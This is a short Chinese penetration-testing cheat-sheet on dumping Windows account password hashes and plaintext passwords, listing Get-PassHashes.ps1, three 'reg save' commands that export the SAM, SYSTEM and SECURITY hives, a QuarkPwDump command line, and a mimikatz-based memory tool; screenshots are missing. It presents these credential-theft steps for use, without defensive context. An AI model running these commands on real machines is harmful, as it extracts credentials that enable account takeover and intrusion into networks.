本机hash+明文抓取

1、Get-PassHashes.ps1 本机hash+明文抓取 - 图1

2、导注册表+本地分析 Win2000和XP需要先提到SYSTEM,03开始直接可以reg save 导出的文件大,效率低,但是安全(测试的时候和QuarkPwDump抓取的hash不一致)

  1. reg save hklm\sam sam.hive
  2. reg save hklm\system system.hive
  3. reg save hklm\security security.hive

本机hash+明文抓取 - 图2

3、QuarkPwDump

  1. QuarkPwDump.exe -dhl -o "c:\1.txt"

本机hash+明文抓取 - 图3

4、getpass本地账户明文抓取 闪电小子根据mimikatz写的一个内存获取明文密码

本机hash+明文抓取 - 图4

http://bbs.pediy.com/showthread.php?t=156643